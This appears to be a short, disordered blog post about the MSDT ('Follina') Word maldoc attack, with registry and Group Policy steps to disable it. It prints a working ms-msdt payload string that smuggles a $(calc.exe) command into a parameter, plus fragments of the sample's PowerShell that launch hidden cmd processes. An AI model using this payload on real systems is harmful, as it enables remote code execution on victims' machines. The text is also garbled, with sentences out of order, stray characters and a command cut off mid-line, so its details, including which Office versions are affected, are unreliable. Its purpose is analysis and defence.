![]() ![]() The word document loads a template which has a remote link to an HTML file which uses MSDT to load and execute code (PowerShell). ms-msdt:/id PCWDiagnostic /skip force /param “IT_RebrowseForFile=calc?c IT_LaunchMethod=ContextMenu IT_BrowseForFile=h$(calc.exe))’))))i/././././././././././.exe IT_AutoTroubleshoot=ts_AUTO” It uses Word's external link to load the HTML and then uses the "ms-msdt" scheme to execute PowerShell code. Interesting maldoc was submitted from Belarus. Or via the GUI (locally) or via GPMC etc. Reg add “HKLM\SOFTWARE\Policies\Microsoft\Windows\ScriptedDiagnostics” /t REG_DWORD /v EnableDiagnostics /d 0 You can disable this via GPO (which is a fully supported method vs the reg hacks) ![]() 2019 and lower are! To disable the exploit Group Policy “Invokes a troubleshooting pack at the command line or as part of an automated script, and enables additional options without user input.” Vulnerable VersionsĬurrently we believe Office 365 “Office” client is not vulnerable (tested on Windows 11 with Office 365 pro fully patched) and that previous versions e.g. MSDT is a diagnostic tooling set from Microsoft:Īnswers questions about the MSDT – SQL Server | Microsoft Docs The specific sample showed the following which was hosted on the webserver (xmlformats) $cmd = "c:\windows\system32\cmd.exe" Start-Process $cmd -windowstyle hidden -ArgumentList "/c taskkill /f /im msdt.exe" Start-Process $cmd -windowstyle hidden -ArgumentList "/c cd C:\users\public\
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |